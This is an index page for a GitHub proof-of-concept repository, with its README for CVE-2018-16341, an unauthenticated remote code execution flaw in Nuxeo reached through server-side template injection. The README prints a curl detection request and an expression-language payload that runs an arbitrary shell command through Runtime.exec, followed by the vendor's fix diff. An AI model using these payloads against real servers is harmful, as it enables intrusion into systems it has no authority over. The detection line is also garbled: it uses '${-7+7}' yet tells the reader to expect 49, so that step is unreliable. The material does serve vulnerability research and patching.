Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mpgn/CVE-2018-16341
CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
https://github.com/mpgn/CVE-2018-16341
rce ssti
Last synced: 22 days ago
JSON representation
CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
- Host: GitHub
- URL: https://github.com/mpgn/CVE-2018-16341
- Owner: mpgn
- Created: 2019-06-05T18:24:45.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-06-05T18:43:28.000Z (over 5 years ago)
- Last Synced: 2024-06-06T20:57:59.484Z (6 months ago)
- Topics: rce, ssti
- Language: Python
- Homepage:
- Size: 2.93 KB
- Stars: 25
- Watchers: 1
- Forks: 12
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - mpgn/CVE-2018-16341 - CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection (Python)
README
# CVE-2018-16341
Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI - CVE-2018-16341
![image](https://user-images.githubusercontent.com/5891788/53368219-6e272b00-3948-11e9-8e08-b919c6cf1bcd.png)
**Detailed analysis (not english)**:
- https://www.freebuf.com/vuls/193000.html
- https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/**Security Advisory**:
- https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97**Note**: The version of Nuxeo 9.x is not [supported anymore](https://www.nuxeo.com/legal/supported-versions/) by Nuxeo but a hotfix has been provided for the version 9.x. On my side, the version 9.10 was vulnerable.
---
### The vulnerabilityThis PoC exploit a Server Side Template Injection (SSTI) in order to achieve the RCE located in the file `NuxeoUnknownResource.java`
- To check if Nuxeo is vulnerable just send this payload and check for the number **49**:
```
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
```- Get the RCE using this payload:
```
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}
```---
Fix```diff
@@ -94,8 +92,13 @@ public void connect() throws IOException {
@Override
public InputStream getInputStream() throws IOException {
+ String message = "ERROR: facelet not found";
+ // NXP-25746
+ if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+ message += " at '" + path + "'";
+ }
String msg = ""
- + StringEscapeUtils.escapeHtml4(errorMessage) + "
";
+ + StringEscapeUtils.escapeHtml4(message) + "
";
return new ByteArrayInputStream(msg.getBytes());
}
}
```